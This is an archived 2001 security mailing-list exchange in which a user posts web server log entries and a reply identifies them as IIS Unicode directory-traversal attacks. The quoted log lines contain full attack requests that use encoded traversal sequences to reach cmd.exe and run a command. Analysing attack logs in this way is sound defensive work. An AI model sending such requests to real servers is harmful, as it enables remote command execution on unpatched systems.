[Dshield] win32 exploit?

Ed Ravin eravin at panix.com
Fri Aug 3 21:16:48 GMT 2001


Looks like one of those exploits that tricks IIS in breaking out of its
scripts subdirectory and running arbitrary commands.  The %xx characters
are things that evaluate to either periods or backslashes in Unicode,
and bypass IIS's tests to prevent you from going up one directory, at
least if your IIS server hasn't been patched in the last few months.

Joseph Shraibman writes:
> 
> Does anyone know what this is?
> 
> 216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"
> 
> [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> bogus_host_without_reverse_dns 207.213.220.70 - - [06/Apr/2001:22:21:26
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir




More information about the list mailing list